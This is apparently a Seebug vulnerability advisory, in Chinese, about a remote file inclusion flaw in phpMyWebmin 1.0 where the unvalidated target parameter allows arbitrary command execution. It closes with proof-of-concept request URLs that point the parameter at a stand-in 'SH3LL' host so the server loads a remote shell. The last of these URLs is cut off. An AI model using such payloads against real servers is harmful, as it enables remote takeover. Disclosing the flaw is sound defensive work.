phpMyWebmin远程文件包含漏洞

2006-10-27T00:00:00
ID SSV:177
Type seebug
Reporter Root
Modified 2006-10-27T00:00:00

Description

phpMyWebmin是一款开放源码的内容管理系统。

phpMyWebmin在处理用户请求时存在漏洞,远程攻击者可能利用此漏洞在服务器上执行任意命令。

phpMyWebmin的多个脚本没有正确地验证target参数的输入,允许攻击者通过包含本地或外部资源的任意文件导致执行任意命令。

phpMyWebmin phpMyWebmin 1.0 phpMyWebmin phpMyWebmin 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.josh.ch/joshch/php-tools/phpmywebmin,overview.html

                                        
                                            
                                                http://www.example.com/change_preferences2.php?target=http://SH3LL?
http://www.example.com/create_file.php?target=http://SH3LL?
http://www.example.com/upload_local.php?target=http://SH3LL?
http://www.example.com/upload_multi.php?